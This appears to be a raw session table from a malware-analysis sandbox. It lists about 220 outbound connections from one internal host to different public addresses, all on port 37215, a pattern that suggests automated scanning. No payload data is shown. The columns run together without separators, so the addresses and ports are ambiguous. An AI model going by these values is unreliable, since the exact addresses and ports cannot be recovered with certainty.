                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28436192.168.2.1560426222.221.89.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28437192.168.2.154365237.39.13.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28438192.168.2.1553868121.125.181.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28439192.168.2.155168437.55.157.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28440192.168.2.1556242156.168.16.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28441192.168.2.1560578169.218.247.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28442192.168.2.1536544156.141.157.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28443192.168.2.1534448181.46.133.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28444192.168.2.1538340197.201.200.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28445192.168.2.153502241.231.73.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28446192.168.2.1553662181.246.183.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28447192.168.2.1535074222.125.222.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28448192.168.2.1552062186.24.197.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28449192.168.2.153850694.38.84.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28450192.168.2.1533996138.248.141.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28451192.168.2.1533272197.20.181.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28452192.168.2.1533864121.146.112.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28453192.168.2.1535726122.146.167.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28454192.168.2.1543570186.140.59.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28455192.168.2.154625094.112.138.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28456192.168.2.1557892121.165.175.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28457192.168.2.1550462157.219.84.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28458192.168.2.1538012190.144.135.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28459192.168.2.1535778186.53.102.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28460192.168.2.1555008102.230.23.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28461192.168.2.1552490186.207.121.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28462192.168.2.1534402156.40.206.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28463192.168.2.1544464190.68.33.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28464192.168.2.153685445.229.160.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28465192.168.2.1557620121.102.1.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28466192.168.2.1542476122.44.24.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28467192.168.2.1535340181.223.113.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28468192.168.2.1541658156.104.62.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28469192.168.2.1552600157.22.63.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28470192.168.2.155252035.23.132.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28471192.168.2.1546420197.18.227.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28472192.168.2.1543018138.190.18.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28473192.168.2.154616241.220.189.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28474192.168.2.1534986156.249.238.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28475192.168.2.1547478102.129.82.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28476192.168.2.153555037.131.227.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28477192.168.2.155669637.58.226.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28478192.168.2.1555764105.109.175.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28479192.168.2.154557237.87.32.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28480192.168.2.153380294.234.183.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28481192.168.2.156033441.200.167.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28482192.168.2.155782845.201.252.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28483192.168.2.1560454157.194.202.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28484192.168.2.1556116121.14.9.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28485192.168.2.1557662138.175.89.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28486192.168.2.1560414121.77.156.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28487192.168.2.1540532156.55.47.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28488192.168.2.155635037.249.24.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28489192.168.2.1542940102.248.124.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28490192.168.2.155371641.17.238.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28491192.168.2.1552180157.114.128.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28492192.168.2.1547270157.40.48.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28493192.168.2.1555348104.87.181.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28494192.168.2.155290641.51.38.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28495192.168.2.1550964222.238.119.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28496192.168.2.1546040121.94.176.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28497192.168.2.154914441.240.179.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28498192.168.2.1541736186.147.93.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28499192.168.2.154368841.23.111.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28500192.168.2.1554226156.27.110.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28501192.168.2.1553948181.73.213.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28502192.168.2.1558394122.132.28.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28503192.168.2.155635437.48.53.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28504192.168.2.155042837.19.131.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28505192.168.2.1544630197.162.207.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28506192.168.2.1538948181.243.91.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28507192.168.2.155135431.190.65.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28508192.168.2.155157837.120.235.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28509192.168.2.1553360138.224.55.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28510192.168.2.1554528121.142.9.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28511192.168.2.153450641.84.88.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28512192.168.2.1549306157.134.14.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28513192.168.2.154001237.81.34.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28514192.168.2.1546836138.241.207.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28515192.168.2.1536998185.6.254.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28516192.168.2.154893241.9.117.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28517192.168.2.153498031.234.97.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28518192.168.2.154350431.0.72.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28519192.168.2.155629031.236.73.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28520192.168.2.155161441.182.82.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28521192.168.2.154031094.242.161.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28522192.168.2.1550176122.230.83.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28523192.168.2.154932476.93.65.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28524192.168.2.1559494157.140.22.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28525192.168.2.156039237.58.149.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28526192.168.2.1553272186.47.205.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28527192.168.2.1560902157.210.108.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28528192.168.2.1555600190.113.124.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28529192.168.2.1550178157.153.199.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28530192.168.2.1541868122.60.164.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28531192.168.2.153758294.25.26.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28532192.168.2.1536996138.242.210.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28533192.168.2.1556612181.253.146.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28534192.168.2.1539992157.3.215.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28535192.168.2.1553540138.93.49.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28536192.168.2.155295231.43.234.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28537192.168.2.1553400222.3.18.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28538192.168.2.1551670157.155.130.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28539192.168.2.155641637.54.62.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28540192.168.2.1535758186.2.145.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28541192.168.2.1550492190.12.81.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28542192.168.2.154485631.96.14.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28543192.168.2.1536830138.76.23.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28544192.168.2.1540270190.8.72.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28545192.168.2.1540064122.80.141.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28546192.168.2.1538504186.89.93.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28547192.168.2.1538418157.207.95.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28548192.168.2.155308641.195.217.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28549192.168.2.153921641.228.164.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28550192.168.2.1546188122.247.226.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28551192.168.2.155258645.107.224.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28552192.168.2.154682237.212.220.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28553192.168.2.1551140121.91.18.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28554192.168.2.155503441.47.20.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28555192.168.2.1537646186.63.72.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28556192.168.2.1547352122.158.149.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28557192.168.2.153900641.73.225.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28558192.168.2.1536864122.249.5.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28559192.168.2.1553992122.4.84.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28560192.168.2.1548366121.157.209.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28561192.168.2.1534928121.161.206.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28562192.168.2.1535708190.80.154.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28563192.168.2.1555326102.185.222.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28564192.168.2.1552590186.243.227.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28565192.168.2.154252231.181.91.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28566192.168.2.1537338157.119.111.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28567192.168.2.1554790102.32.195.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28568192.168.2.1560552222.165.185.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28569192.168.2.1554168157.193.67.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28570192.168.2.1544632157.64.107.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28571192.168.2.1537350102.164.227.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28572192.168.2.155206894.51.48.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28573192.168.2.1548332222.65.155.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28574192.168.2.1558830102.72.122.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28575192.168.2.155377482.186.127.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28576192.168.2.1536970157.169.19.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28577192.168.2.1554374190.161.64.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28578192.168.2.1537348121.171.101.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28579192.168.2.154370040.195.188.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28580192.168.2.154653437.118.169.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28581192.168.2.1536196186.116.231.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28582192.168.2.1557406169.244.166.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28583192.168.2.1533310190.136.65.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28584192.168.2.155223645.96.175.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28585192.168.2.1534722197.21.133.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28586192.168.2.1560814156.239.206.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28587192.168.2.1557802121.186.96.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28588192.168.2.154375631.228.102.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28589192.168.2.1533486190.235.58.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28590192.168.2.1554950157.215.55.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28591192.168.2.154148831.75.201.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28592192.168.2.1533104156.85.17.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28593192.168.2.1534738122.38.241.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28594192.168.2.154093641.103.114.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28595192.168.2.1538902190.170.33.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28596192.168.2.153399494.9.5.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28597192.168.2.1560706186.206.33.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28598192.168.2.154016848.226.65.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28599192.168.2.155997837.78.159.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28600192.168.2.155096645.136.188.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28601192.168.2.1553234138.208.24.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28602192.168.2.1549462157.207.84.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28603192.168.2.1553870186.124.207.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28604192.168.2.154810245.17.46.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28605192.168.2.155976825.0.123.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28606192.168.2.1535416186.40.49.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28607192.168.2.154986894.123.5.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28608192.168.2.1533370190.142.7.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28609192.168.2.155479231.77.247.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28610192.168.2.1537854181.20.181.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28611192.168.2.1547708156.6.32.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28612192.168.2.1542340121.104.116.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28613192.168.2.1540516197.150.168.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28614192.168.2.1544840186.12.245.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28615192.168.2.154409437.93.115.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28616192.168.2.1552870222.10.128.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28617192.168.2.153865631.48.248.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28618192.168.2.1544066102.192.130.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28619192.168.2.1554524156.219.69.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28620192.168.2.1538254156.137.142.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28621192.168.2.1559542121.62.132.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28622192.168.2.1539944138.214.10.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28623192.168.2.1536428186.134.176.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28624192.168.2.1532842197.161.16.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28625192.168.2.1552396138.35.232.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28626192.168.2.1537580138.179.42.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28627192.168.2.1546112157.223.221.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28628192.168.2.153520237.101.73.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28629192.168.2.1552638181.69.74.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28630192.168.2.1552392157.32.179.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28631192.168.2.1544414190.241.12.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28632192.168.2.1552994157.69.143.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28633192.168.2.154714494.97.103.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28634192.168.2.1543618102.195.110.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28635192.168.2.1556158190.190.242.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28636192.168.2.155334081.237.62.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28637192.168.2.154408437.112.204.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28638192.168.2.155340645.42.229.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28639192.168.2.154747241.208.202.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28640192.168.2.155435245.199.213.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28641192.168.2.1550986186.42.36.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28642192.168.2.1555808186.177.54.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28643192.168.2.1542114197.171.197.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28644192.168.2.1559226190.52.98.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28645192.168.2.1536598122.103.252.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28646192.168.2.155937637.126.100.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28647192.168.2.1552006222.64.118.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28648192.168.2.155705294.29.91.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28649192.168.2.1553238138.53.139.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28650192.168.2.1536226181.217.168.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28651192.168.2.1551226121.92.244.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28652192.168.2.1554378190.237.234.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28653192.168.2.1540062200.92.185.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
